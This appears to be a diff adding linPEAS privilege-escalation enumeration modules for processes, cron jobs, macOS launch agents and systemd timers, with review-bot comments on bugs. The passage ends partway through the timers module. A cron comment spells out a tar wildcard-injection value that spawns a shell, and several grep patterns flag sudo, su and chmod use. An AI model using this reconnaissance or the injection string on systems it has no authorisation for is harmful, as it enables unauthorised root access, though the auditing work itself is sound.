# Title: Processes & Cron & Services & Timers - Process binaries permissions
# ID: PR_Process_binaries_perms
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: Check the permissions of the binaries of the running processes
# License: GNU GPL
# Version: 1.2
# Functions Used: print_2title, print_info
# Global Variables: $knw_usrs, $nosh_usrs, $NOUSEPS, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders
# Initial Functions:
# Generated Global Variables: $binW, $bpath, $pid
# Fat linpeas: 0
# Small linpeas: 1
if ! [ "$SEARCH_IN_FOLDER" ]; then
if [ "$NOUSEPS" ]; then
print_2title "Binary processes permissions (non 'root root' and not belonging to current user)"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes"
# Get list of writable binaries
binW=""
for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
# Skip if process doesn't exist or we can't access it
[ ! -r "/proc/$pid/exe" ] && continue
# Get binary path
bpath=$(readlink "/proc/$pid/exe" 2>/dev/null)
[ -z "$bpath" ] && continue
# Check if binary is writable
if [ -w "$bpath" ]; then
if [ -z "$binW" ]; then
binW="$bpath"
else
binW="$binW|$bpath"
fi
fi
done
# Get and display binary permissions
for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
# Skip if process doesn't exist or we can't access it
[ ! -r "/proc/$pid/exe" ] && continue
# Get binary path
bpath=$(readlink "/proc/$pid/exe" 2>/dev/null)
[ -z "$bpath" ] && continue
# Display binary permissions if file exists
if [ -e "$bpath" ]; then
ls -la "$bpath" 2>/dev/null
fi
done | grep -Ev "\sroot\s+root" | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
echo ""
fi
fi
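Review bot: `binW` is initialised to the empty string, so on any host without a writable process binary (the common case) `sed -${E} "s,$binW,${SED_RED_YELLOW},g"` receives an empty regex and GNU sed aborts with "no previous regular expression", which empties the whole pipeline and hides the `ls -la` listing for every process. Seed `binW` with a sentinel that can never match a path, or skip that sed when `binW` is empty. Two smaller points: the collected paths are joined with `|` and handed to sed -E unescaped, so a path containing `+`, `.` or `(` alters the regex; and the two `find /proc` loops resolve the same `/proc/$pid/exe` links twice and could be one loop that gathers the `ls -la` output and the writable list together.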


@ -0,0 +1,60 @@
# Title: Processes & Cron & Services & Timers - Process opened by other users
# ID: PR_Processes_PPID_different_user
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: Processes whose PPID belongs to a different user (not root)
# License: GNU GPL
# Version: 1.1
# Functions Used: print_2title, print_info
# Global Variables: $nosh_usrs, $NOUSEPS, $SEARCH_IN_FOLDER, $sh_usrs, $USER
# Initial Functions:
# Generated Global Variables: $ppid_user, $pid, $ppid, $user, $ppid_uid, $user_uid
# Fat linpeas: 0
# Small linpeas: 1
if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then
print_2title "Processes whose PPID belongs to a different user (not root)"
print_info "You will know if a user can somehow spawn processes as a different user"
# Function to get user by PID using /proc
get_user_by_pid() {
if [ -r "/proc/$1/status" ]; then
grep "^Uid:" "/proc/$1/status" 2>/dev/null | awk '{print $2}'
fi
}
# Function to get username by UID
get_username_by_uid() {
if [ -r "/etc/passwd" ]; then
grep "^[^:]*:[^:]*:$1:" "/etc/passwd" 2>/dev/null | cut -d: -f1
fi
}
# Find processes with PPID and user info, then filter those where PPID's user is different from the process's user
for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
# Skip if process doesn't exist or we can't access it
[ ! -r "/proc/$pid/status" ] && continue
# Get process user
user_uid=$(get_user_by_pid "$pid")
[ -z "$user_uid" ] && continue
user=$(get_username_by_uid "$user_uid")
[ -z "$user" ] && continue
# Get PPID
ppid=$(grep "^PPid:" "/proc/$pid/status" 2>/dev/null | awk '{print $2}')
[ -z "$ppid" ] || [ "$ppid" = "0" ] && continue
# Get PPID user
ppid_uid=$(get_user_by_pid "$ppid")
[ -z "$ppid_uid" ] && continue
ppid_user=$(get_username_by_uid "$ppid_uid")
[ -z "$ppid_user" ] && continue
# Check if users are different and PPID user is not root
if [ "$user" != "$ppid_user" ] && [ "$ppid_user" != "root" ]; then
echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
fi
done
echo ""
fi
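Review bot: the comparison is made on user names resolved from /etc/passwd by `get_username_by_uid`, so any process whose owner comes through NSS rather than /etc/passwd (LDAP, sssd, systemd-homed) is silently dropped by the `[ -z "$user" ] && continue` and `[ -z "$ppid_user" ] && continue` guards, together with the parent/child relationship the module is meant to report. Compare the UIDs you already have (`"$user_uid" != "$ppid_uid"` and `"$ppid_uid" != "0"`) and resolve names only for the printed line, falling back to the numeric UID when the lookup fails. Minor: `get_user_by_pid` and `get_username_by_uid` are defined inside the module while the "Initial Functions:" header line is left empty, and the same `get_username_by_uid` is defined a second time in the next module, so one shared helper would do.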


@ -0,0 +1,64 @@
# Title: Processes & Cron & Services & Timers - Files opened by processes belonging to other users
# ID: PR_Files_open_process_other_user
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: Files opened by processes belonging to other users
# License: GNU GPL
# Version: 1.1
# Functions Used: print_2title, print_info
# Global Variables: $IAMROOT, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER
# Initial Functions:
# Generated Global Variables: $user_uid, $pid, $fd_target, $cmd, $user
# Fat linpeas: 0
# Small linpeas: 1
if ! [ "$SEARCH_IN_FOLDER" ]; then
if ! [ "$IAMROOT" ]; then
print_2title "Files opened by processes belonging to other users"
print_info "This is usually empty because of the lack of privileges to read other user processes information"
# Function to get username by UID
get_username_by_uid() {
if [ -r "/etc/passwd" ]; then
grep "^[^:]*:[^:]*:$1:" "/etc/passwd" 2>/dev/null | cut -d: -f1
fi
}
# Check each process
for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
# Skip if process doesn't exist or we can't access it
[ ! -r "/proc/$pid/status" ] && continue
[ ! -r "/proc/$pid/fd" ] && continue
# Get process user
user_uid=$(grep "^Uid:" "/proc/$pid/status" 2>/dev/null | awk '{print $2}')
[ -z "$user_uid" ] && continue
user=$(get_username_by_uid "$user_uid")
[ -z "$user" ] && continue
# Skip if process belongs to current user
[ "$user" = "$USER" ] && continue
# Get process command
cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
[ -z "$cmd" ] && continue
# Check file descriptors
for fd in /proc/$pid/fd/*; do
[ ! -e "$fd" ] && continue
fd_target=$(readlink "$fd" 2>/dev/null)
[ -z "$fd_target" ] && continue
# Skip if target doesn't exist or is a special file
[ ! -e "$fd_target" ] && continue
case "$fd_target" in
/dev/*|/proc/*|/sys/*) continue ;;
esac
echo "Process $pid ($user) - $cmd"
echo " └─ Has open file: $fd_target" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
done
done
echo ""
fi
fi
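Review bot: the `Process $pid ($user) - $cmd` header is echoed inside the inner `for fd in /proc/$pid/fd/*` loop, so a process with ten open files prints its header ten times; print it once on the first matching descriptor, as the PR_Process_cred_in_memory module does with its `found_cred_files` flag. Also the `[ ! -e "$fd_target" ]` test drops unlinked-but-open files, which `readlink` reports with a " (deleted)" suffix; those are worth listing rather than hiding, so consider keeping targets that end in " (deleted)". As in the previous module, `$fd` is missing from the "Generated Global Variables" header line.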


@ -0,0 +1,30 @@
# Title: Processes & Cron & Services & Timers - Different processes 1 min
# ID: PR_Different_procs_1min
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Different processes executed during 1 min
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info
# Global Variables: $nosh_usrs, $sh_usrs, $Wfolders
# Initial Functions:
# Generated Global Variables: $temp_file
# Fat linpeas: 0
# Small linpeas: 1
if ! [ "$SEARCH_IN_FOLDER" ]; then
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#frequent-cron-jobs"
temp_file=$(mktemp)
if [ "$(ps -e -o user,command 2>/dev/null)" ]; then
for i in $(seq 1 1210); do
ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05;
done;
sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},";
rm "$temp_file";
fi
echo ""
fi
fi
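Review bot: the filter `grep -E -v "\s*[1-9][0-9][0-9][0-9]"` is meant to drop command lines seen a thousand or more times across the 1210 samples, but it is unanchored, so it also hides every command line containing any four-digit number (a port such as 8080, a PID, a year in a path); anchor it to the count column produced by `uniq -c`, e.g. `^\s*[1-9][0-9]{3}`. The "Global Variables" header line lists only `$nosh_usrs, $sh_usrs, $Wfolders`, but the body also reads `$SEARCH_IN_FOLDER`, `$FAST`, `$SUPERFAST` and `$USER`. Also, `seq` and a fractional `sleep 0.05` are not guaranteed by POSIX sh, and 1210 iterations of `ps` plus the sleep take noticeably longer than the one minute the title advertises.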


@ -0,0 +1,250 @@
# Title: Processes & Cron & Services & Timers - Cron jobs and Wildcards
# ID: PR_Cron_jobs
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: Enumerate system cron jobs and check for privilege escalation vectors
# License: GNU GPL
# Version: 1.2
# Functions Used: echo_not_found, print_2title, print_info
# Global Variables: $cronjobsG, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders, $cronjobsB, $PATH
# Initial Functions:
# Generated Global Variables: $cmd, $VAR, $file, $path, $user_crontab, $username, $job_id, $cron_dir, $crontab, $findings, $line, $finding, $bin
# Fat linpeas: 0
# Small linpeas: 1
if ! [ "$SEARCH_IN_FOLDER" ]; then
print_2title "Check for vulnerable cron jobs"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs"
print_3title "Cron jobs list"
command -v crontab 2>/dev/null || echo_not_found "crontab"
crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
command -v incrontab 2>/dev/null || echo_not_found "incrontab"
incrontab -l 2>/dev/null
ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
atq 2>/dev/null
echo ""
print_3title "Checking for specific cron jobs vulnerabilities"
# Function to check if a binary is writable and executable
check_binary_perms() {
local bin="$1"
[ -z "$bin" ] && return
# Skip if binary doesn't exist
[ ! -e "$bin" ] && return
# Check if it's a regular file
[ ! -f "$bin" ] && return
# Check if it's writable and executable
if [ -w "$bin" ]; then
echo "Writable binary: $bin"
ls -l "$bin" 2>/dev/null
fi
}
# Function to extract binary path from command
get_binary_path() {
local cmd="$1"
local bin=""
# Try to get the first word of the command
bin=$(echo "$cmd" | awk '{print $1}')
[ -z "$bin" ] && return
# If it's an absolute path, use it directly
if [ "$(echo "$bin" | cut -c1)" = "/" ]; then
echo "$bin"
return
fi
# If it's a relative path, try to resolve it
if [ -e "$bin" ]; then
echo "$(pwd)/$bin"
return
fi
# Try to find it in PATH
for path in $(echo "$PATH" | tr ':' ' '); do
if [ -x "$path/$bin" ]; then
echo "$path/$bin"
return
fi
done
}
# Function to check for privilege escalation vectors in a command
check_privesc_vectors() {
local cmd="$1"
local file="$2"
local findings=""
local bin=""
# Skip common false positives (mail commands, shell conditionals, variable assignments)
if echo "$cmd" | grep -qE '^(mail|echo|then|else|fi|if|for|while|do|done|case|esac|exit|return|break|continue|:|\[|test|\[\[|\]\]|true|false|source|\.|cd|pwd|export|unset|readonly|local|declare|typeset|alias|unalias|set|unset|shift|wait|trap|umask|ulimit|exec|eval|command|builtin|let|read|printf|^[[:space:]]*[A-Za-z0-9_]+[[:space:]]*[=:])'; then
return
fi
# Get the binary path
bin=$(get_binary_path "$cmd")
if [ -n "$bin" ]; then
check_binary_perms "$bin"
fi
# Check for wildcard injection vectors
# Attack: Using wildcards in tar/chmod/chown to execute arbitrary commands
# Example: tar cf archive.tar * (where * expands to --checkpoint=1 --checkpoint-action=exec=sh)
if echo "$cmd" | grep -qE '\*'; then
findings="${findings}POTENTIAL_WILDCARD_INJECTION: Command uses wildcards with potentially exploitable command\n"
fi
# Check for path hijacking vectors
# Attack: Using relative paths or commands without full path that can be hijacked
# Example: script.sh instead of /usr/bin/script.sh
if echo "$cmd" | grep -qE '^[[:space:]]*[^/][^[:space:]]*[[:space:]]'; then
# Skip common false positives like shell builtins, control structures, and variable assignments
# Also skip test commands ([ ]), logical operators (&& ||), and complex shell constructs
if ! echo "$cmd" | grep -qE '^[[:space:]]*(cd|\.|source|\./|if|then|else|fi|for|while|do|done|case|esac|exit|return|break|continue|:|\[[[:space:]]|test|\[\[|\]\]|true|false|export|unset|readonly|local|declare|typeset|alias|unalias|set|unset|shift|wait|trap|umask|ulimit|exec|eval|command|builtin|let|read|printf|[A-Za-z0-9_]+[[:space:]]*[=:]|&&|\|\||;|\(|\)|\{|\})'; then
findings="${findings}PATH_HIJACKING: Command uses relative path\n"
fi
fi
# Check for command injection vectors
# Attack: Using unquoted variables or command substitution that can be injected
# Example: echo $VAR or echo $(command)
if echo "$cmd" | grep -qE '\$\{?[A-Za-z0-9_]|\$\(|`'; then
findings="${findings}COMMAND_INJECTION: Command uses unquoted variables or command substitution\n"
fi
# Check for overly permissive commands
# Attack: Commands that can be used to escalate privileges
# Example: chmod 777, chown root, etc.
if echo "$cmd" | grep -qE '\b(chmod\s+[0-7]{3,4}|chown\s+root|chgrp\s+root|sudo|su |pkexec)\b'; then
findings="${findings}PERMISSIVE_COMMAND: Command modifies permissions or uses privilege escalation tools\n"
fi
# If any findings, print them
if [ -n "$findings" ]; then
echo "Potential privilege escalation in cron job:"
echo " └─ File: $file"
echo " └─ Command: $cmd"
if [ -n "$bin" ]; then
echo " └─ Binary: $bin"
fi
echo " └─ Findings:"
echo "$findings" | while read -r finding; do
[ -n "$finding" ] && echo " * $finding"
done
fi
}
# Check system crontabs
#echo "Checking system crontabs..."
#for crontab in /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/* /var/spool/cron/crontabs/* /etc/at* /etc/anacrontab /etc/incron.d/* /var/spool/incron/*; do
# [ ! -f "$crontab" ] && continue
# [ ! -r "$crontab" ] && continue
# # Check if the file is writable
# if [ -w "$crontab" ]; then
# echo "Writable cron file: $crontab"
# fi
# # Check each line for privilege escalation vectors
# while IFS= read -r line || [ -n "$line" ]; do
# # Skip comments and empty lines
# case "$line" in
# \#*|"") continue ;;
# esac
# # Extract the command part (everything after the time specification)
# cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
# [ -z "$cmd" ] && continue
# check_privesc_vectors "$cmd" "$crontab"
# done < "$crontab"
#done
# Check user crontabs
#echo "Checking user crontabs..."
#if command -v crontab >/dev/null 2>&1; then
# # Check current user's crontab
# crontab -l 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
# case "$line" in
# \#*|"") continue ;;
# esac
# cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
# [ -z "$cmd" ] && continue
# check_privesc_vectors "$cmd" "current user crontab"
# done
# # Check other users' crontabs if accessible
# for user_crontab in /var/spool/cron/crontabs/*; do
# [ ! -f "$user_crontab" ] && continue
# [ ! -r "$user_crontab" ] && continue
# username=$(basename "$user_crontab")
# [ "$username" = "$USER" ] && continue
# echo "Found crontab for user: $username"
# while IFS= read -r line || [ -n "$line" ]; do
# case "$line" in
# \#*|"") continue ;;
# esac
# cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
# [ -z "$cmd" ] && continue
# check_privesc_vectors "$cmd" "$user_crontab"
# done < "$user_crontab"
# done
#else
# echo_not_found "crontab"
#fi
# Check for writable cron directories
echo "Checking cron directories..."
for cron_dir in /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly /var/spool/cron/crontabs /usr/lib/cron/tabs /private/var/at/jobs /var/at/tabs /etc/periodic; do
[ ! -d "$cron_dir" ] && continue
if [ -w "$cron_dir" ]; then
echo "Writable cron directory: $cron_dir"
fi
done
# Check for at jobs
#if command -v atq >/dev/null 2>&1; then
# echo "Checking at jobs..."
# atq 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
# [ -z "$line" ] && continue
# job_id=$(echo "$line" | awk '{print $1}')
# [ -z "$job_id" ] && continue
# at -c "$job_id" 2>/dev/null | while IFS= read -r cmd || [ -n "$cmd" ]; do
# case "$cmd" in
# \#*|"") continue ;;
# esac
# check_privesc_vectors "$cmd" "at job $job_id"
# done
# done
#fi
# Check for incron jobs
#if command -v incrontab >/dev/null 2>&1; then
# echo "Checking incron jobs..."
# incrontab -l 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
# case "$line" in
# \#*|"") continue ;;
# esac
# cmd=$(echo "$line" | awk '{print $3}')
# [ -z "$cmd" ] && continue
# check_privesc_vectors "$cmd" "incron job"
# done
#fi
else
print_2title "Cron jobs"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs"
find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \;
fi
echo ""
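Review bot: the helpers `check_binary_perms`, `get_binary_path` and `check_privesc_vectors` (roughly a hundred lines) are defined but never called, because every caller (system crontabs, user crontabs, at jobs, incron jobs) is commented out; after `print_3title "Checking for specific cron jobs vulnerabilities"` the only check that actually runs is the writable-directory loop. Either re-enable the callers or drop the dead code so the module stays readable. If they are re-enabled, the command extraction `sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //'` needs a sixth field for /etc/crontab and /etc/cron.d entries, which carry a user column before the command, otherwise the user name is analysed as the binary. Header points: `print_3title` is used but missing from "Functions Used", and `local` is not POSIX sh (the other new modules use it too, so this is a project-wide decision rather than a blocker).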


@ -0,0 +1,169 @@
# Title: Processes & Cron & Services & Timers - Third party LaunchAgents & LaunchDemons
# ID: PR_Macos_launch_agents_daemons
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: Third party LaunchAgents & LaunchDemons and privilege escalation vectors
# License: GNU GPL
# Version: 1.1
# Functions Used: print_2title, print_info
# Global Variables: $MACPEAS, $SEARCH_IN_FOLDER
# Initial Functions:
# Generated Global Variables: $program, $plist_content, $binary_path, $periodic_dir, $workdir, $startup_dir, $line, $emond_script, $startup_item, $finding, $location, $findings, $login_item, $plist, $periodic_script, $plist_dir
# Fat linpeas: 0
# Small linpeas: 0
if ! [ "$SEARCH_IN_FOLDER" ]; then
if [ "$MACPEAS" ]; then
print_2title "Third party LaunchAgents & LaunchDemons"
print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#launchd"
print_info "Checking for privilege escalation vectors in LaunchAgents & LaunchDaemons:"
print_info "1. Writable plist files"
print_info "2. Writable program binaries"
print_info "3. Environment variables with sensitive data"
print_info "4. Unsafe program arguments"
print_info "5. RunAtLoad with elevated privileges"
print_info "6. KeepAlive with elevated privileges"
# Function to check plist content for privilege escalation vectors
check_plist_content() {
local plist="$1"
local findings=""
# Check for environment variables
if defaults read "$plist" EnvironmentVariables 2>/dev/null | grep -qE '(PASS|SECRET|KEY|TOKEN|CRED)'; then
findings="${findings}ENV_VARS: Contains sensitive environment variables\n"
fi
# Check for RunAtLoad with elevated privileges
if defaults read "$plist" RunAtLoad 2>/dev/null | grep -q "true"; then
if [ -w "$plist" ]; then
findings="${findings}RUN_AT_LOAD: Runs at load and plist is writable\n"
fi
fi
# Check for KeepAlive with elevated privileges
if defaults read "$plist" KeepAlive 2>/dev/null | grep -q "true"; then
if [ -w "$plist" ]; then
findings="${findings}KEEP_ALIVE: Keeps running and plist is writable\n"
fi
fi
# Check for unsafe program arguments
if defaults read "$plist" ProgramArguments 2>/dev/null | grep -qE '(sudo|su|chmod|chown|chroot|mount)'; then
findings="${findings}UNSAFE_ARGS: Uses potentially dangerous program arguments\n"
fi
# Check for writable working directory
if defaults read "$plist" WorkingDirectory 2>/dev/null | grep -qE '^/'; then
local workdir=$(defaults read "$plist" WorkingDirectory 2>/dev/null)
if [ -w "$workdir" ]; then
findings="${findings}WRITABLE_WORKDIR: Working directory is writable\n"
fi
fi
# If any findings, print them
if [ -n "$findings" ]; then
echo "Potential privilege escalation in: $plist"
echo "$findings" | while read -r finding; do
[ -n "$finding" ] && echo " └─ $finding"
done
fi
}
# Check system and user LaunchAgents & LaunchDaemons
for plist_dir in /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/; do
[ ! -d "$plist_dir" ] && continue
echo "Checking $plist_dir..."
find "$plist_dir" -name "*.plist" 2>/dev/null | while read -r plist; do
# Check if plist is writable
if [ -w "$plist" ]; then
echo "Writable plist: $plist" | sed -${E} "s,.*,${SED_RED_YELLOW},"
fi
# Get program path
program=""
program=$(defaults read "$plist" Program 2>/dev/null)
if ! [ "$program" ]; then
program=$(defaults read "$plist" ProgramArguments 2>/dev/null | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
fi
# Check if program is writable
if [ -n "$program" ] && [ -w "$program" ]; then
echo "Writable program: $program" | sed -${E} "s,.*,${SED_RED_YELLOW},"
ls -l "$program" 2>/dev/null
fi
# Check plist content for privilege escalation vectors
check_plist_content "$plist"
done
done
echo ""
print_2title "StartupItems"
print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items"
for startup_dir in /Library/StartupItems/ /System/Library/StartupItems/; do
[ ! -d "$startup_dir" ] && continue
echo "Checking $startup_dir..."
find "$startup_dir" -type f -executable 2>/dev/null | while read -r startup_item; do
if [ -w "$startup_item" ]; then
echo "Writable startup item: $startup_item" | sed -${E} "s,.*,${SED_RED_YELLOW},"
ls -l "$startup_item" 2>/dev/null
fi
done
done
echo ""
print_2title "Login Items"
print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items"
osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null | tr ", " "\n" | while read -r login_item; do
if [ -n "$login_item" ]; then
# Try to find the actual binary
binary_path=$(mdfind "kMDItemDisplayName == '$login_item'" 2>/dev/null | head -n 1)
if [ -n "$binary_path" ] && [ -w "$binary_path" ]; then
echo "Writable login item binary: $binary_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"
ls -l "$binary_path" 2>/dev/null
fi
fi
done
echo ""
print_2title "SPStartupItemDataType"
system_profiler SPStartupItemDataType 2>/dev/null | while read -r line; do
if echo "$line" | grep -q "Location:"; then
location=$(echo "$line" | cut -d: -f2- | xargs)
if [ -w "$location" ]; then
echo "Writable startup item location: $location" | sed -${E} "s,.*,${SED_RED_YELLOW},"
ls -l "$location" 2>/dev/null
fi
fi
done
echo ""
print_2title "Emond scripts"
print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#emond"
if [ -d "/private/var/db/emondClients" ]; then
find "/private/var/db/emondClients" -type f 2>/dev/null | while read -r emond_script; do
if [ -w "$emond_script" ]; then
echo "Writable emond script: $emond_script" | sed -${E} "s,.*,${SED_RED_YELLOW},"
ls -l "$emond_script" 2>/dev/null
fi
done
fi
echo ""
print_2title "Periodic tasks"
print_info "Checking periodic tasks for privilege escalation vectors"
for periodic_dir in /etc/periodic/daily /etc/periodic/weekly /etc/periodic/monthly; do
[ ! -d "$periodic_dir" ] && continue
echo "Checking $periodic_dir..."
find "$periodic_dir" -type f -executable 2>/dev/null | while read -r periodic_script; do
if [ -w "$periodic_script" ]; then
echo "Writable periodic script: $periodic_script" | sed -${E} "s,.*,${SED_RED_YELLOW},"
ls -l "$periodic_script" 2>/dev/null
fi
done
done
echo ""
fi
fi
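Review bot: `defaults read` prints booleans as `1`/`0`, not `true`/`false`, so `defaults read "$plist" RunAtLoad 2>/dev/null | grep -q "true"` and the matching KeepAlive test never succeed and the RUN_AT_LOAD and KEEP_ALIVE findings are unreachable; match `1` instead. Two more macOS-specific problems: `find "$startup_dir" -type f -executable` and the same form in the periodic loop use a GNU primary that BSD find on macOS rejects, so both loops print nothing (use `-perm +111`); and `tr ", " "\n"` on the login-item list turns every space into a newline as well, splitting names such as "Google Drive" into fragments that `mdfind` cannot match (split on the comma only, then trim). The ProgramArguments regex `(sudo|su|chmod|chown|chroot|mount)` is unanchored, so `su` matches any argument containing those two letters (a path with "sub" or "result" in it); bound it with word anchors or compare whole argv entries. Finally, the title and description say "LaunchDemons"; the unit type is LaunchDaemons.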


@ -0,0 +1,156 @@
# Title: Processes & Cron & Services & Timers - System Timers
# ID: PR_System_timers
# Author: Carlos Polop
# Last Update: 2024-03-19
# Description: System Timers and privilege escalation vectors
# License: GNU GPL
# Version: 1.2
# Functions Used: echo_not_found, print_2title, print_info, print_3title
# Global Variables: $SEARCH_IN_FOLDER, $timersG
# Initial Functions:
# Generated Global Variables: $timer_unit, $timer_path, $timer_content, $exec_path, $timer_file, $line, $findings, $unit_path, $finding, $service_unit, $timer, $target_unit, $target_file
# Fat linpeas: 0
# Small linpeas: 1
if ! [ "$SEARCH_IN_FOLDER" ]; then
print_2title "System timers"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers"
# Function to check timer content for privilege escalation vectors
check_timer_content() {
local timer="$1"
local findings=""
# Get the service unit this timer activates
local service_unit=$(systemctl show "$timer" -p Unit 2>/dev/null | cut -d= -f2)
if [ -n "$service_unit" ]; then
# Check if the service runs with elevated privileges
if systemctl show "$service_unit" -p User 2>/dev/null | grep -q "root"; then
findings="${findings}RUNS_AS_ROOT: Service runs as root\n"
fi
# Get the executable path
local exec_path=$(systemctl show "$service_unit" -p ExecStart 2>/dev/null | cut -d= -f2 | cut -d' ' -f1)
if [ -n "$exec_path" ]; then
if [ -w "$exec_path" ]; then
findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
fi
# Check for relative paths
case "$exec_path" in
/*) : ;; # Absolute path, do nothing
*) findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n" ;;
esac
fi
# Check for unsafe configurations
if systemctl show "$service_unit" -p ExecStart 2>/dev/null | grep -qE '(chmod|chown|mount|sudo|su)'; then
findings="${findings}UNSAFE_CMD: Uses potentially dangerous commands\n"
fi
# Check for weak permissions
if [ -e "$exec_path" ] && [ "$(stat -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
findings="${findings}WEAK_PERMS: Executable has 777 permissions\n"
fi
fi
# If any findings, print them
if [ -n "$findings" ]; then
echo "Potential privilege escalation in timer: $timer"
echo "$findings" | while read -r finding; do
[ -n "$finding" ] && echo " └─ $finding"
done
fi
}
# Function to check timer file for privilege escalation vectors
check_timer_file() {
local timer_file="$1"
local findings=""
# Check if timer file is writable (following symlinks)
if [ -L "$timer_file" ]; then
# If it's a symlink, check the target file
local target_file=$(readlink -f "$timer_file")
if [ -w "$target_file" ]; then
findings="${findings}WRITABLE_FILE: Timer target file is writable: $target_file\n"
fi
elif [ -w "$timer_file" ]; then
findings="${findings}WRITABLE_FILE: Timer file is writable\n"
fi
# Check for weak permissions (following symlinks)
if [ "$(stat -L -c %a "$timer_file" 2>/dev/null)" = "777" ]; then
findings="${findings}WEAK_PERMS: Timer file has 777 permissions\n"
fi
